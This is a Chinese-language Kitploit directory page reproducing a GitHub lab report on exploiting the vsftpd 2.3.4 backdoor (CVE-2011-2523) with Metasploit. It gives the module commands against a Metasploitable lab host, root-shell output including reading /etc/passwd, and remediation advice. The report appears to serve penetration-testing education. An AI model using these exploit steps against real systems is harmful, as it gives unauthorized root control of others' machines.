Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
vsftpd-234-vuln-report — 使用 Metasploit 对 vsftpd 2.3.4(CVE-2011-2523)进行漏洞评估与利用。包含完整报告和 root 权限获取证明。 | Kitploit
工具/GitHubGitHub/vedpakhare/vsftpd-234-vuln-report
漏洞利用框架漏洞分析漏洞利用渗透测试学习与教育Payload 开发
GitHubvedpakhare/vsftpd-234-vuln-report

vsftpd-234-vuln-report

使用 Metasploit 对 vsftpd 2.3.4(CVE-2011-2523)进行漏洞评估与利用。包含完整报告和 root 权限获取证明。

查看仓库
211年前尚未审核
网站

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

💥 vsftpd 2.3.4 后门漏洞利用报告

使用 Metasploit 利用 vsftpd 2.3.4 中的已知漏洞进行攻击。

📌 目标详情

  • 目标 IP: 192.168.150.133
  • 服务: FTP
  • 受影响版本: vsftpd 2.3.4
  • 漏洞利用模块: exploit/unix/ftp/vsftpd_234_backdoor
  • 载荷: 命令 Shell(TCP)

🔍 漏洞概述

vsftpd 2.3.4 包含一个恶意后门,当收到以 :) 结尾的特制用户名时,会在 6200 端口打开一个命令 Shell。

CVE:CVE-2011-2523


🚀 漏洞利用步骤

root@kitploit:~
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run

💥 已获得 Shell 访问权限:

root@kitploit:~
whoami
> root

id
> uid=0(root) gid=0(root)

hostname
> metasploitable

uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...

cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  ...

🔐 影响

Root Shell 访问权限使攻击者能够完全控制目标系统——包括权限提升、横向移动、数据窃取和持久化访问。


✅ 修复建议

  • 请勿使用 vsftpd 2.3.4。
  • 升级到受支持的安全版本。
  • 限制外部对 FTP 的访问。
  • 监控 6200 端口上的可疑流量。

📄 报告

📝 本仓库中提供完整 PDF 报告:vsftpd-exploit-report.pdf


📚 参考资料

  • Rapid7 模块信息
  • CVE-2011-2523 - NVD

👨‍💻 作者

由 vedpakhare 用 🔥 制作

下载工具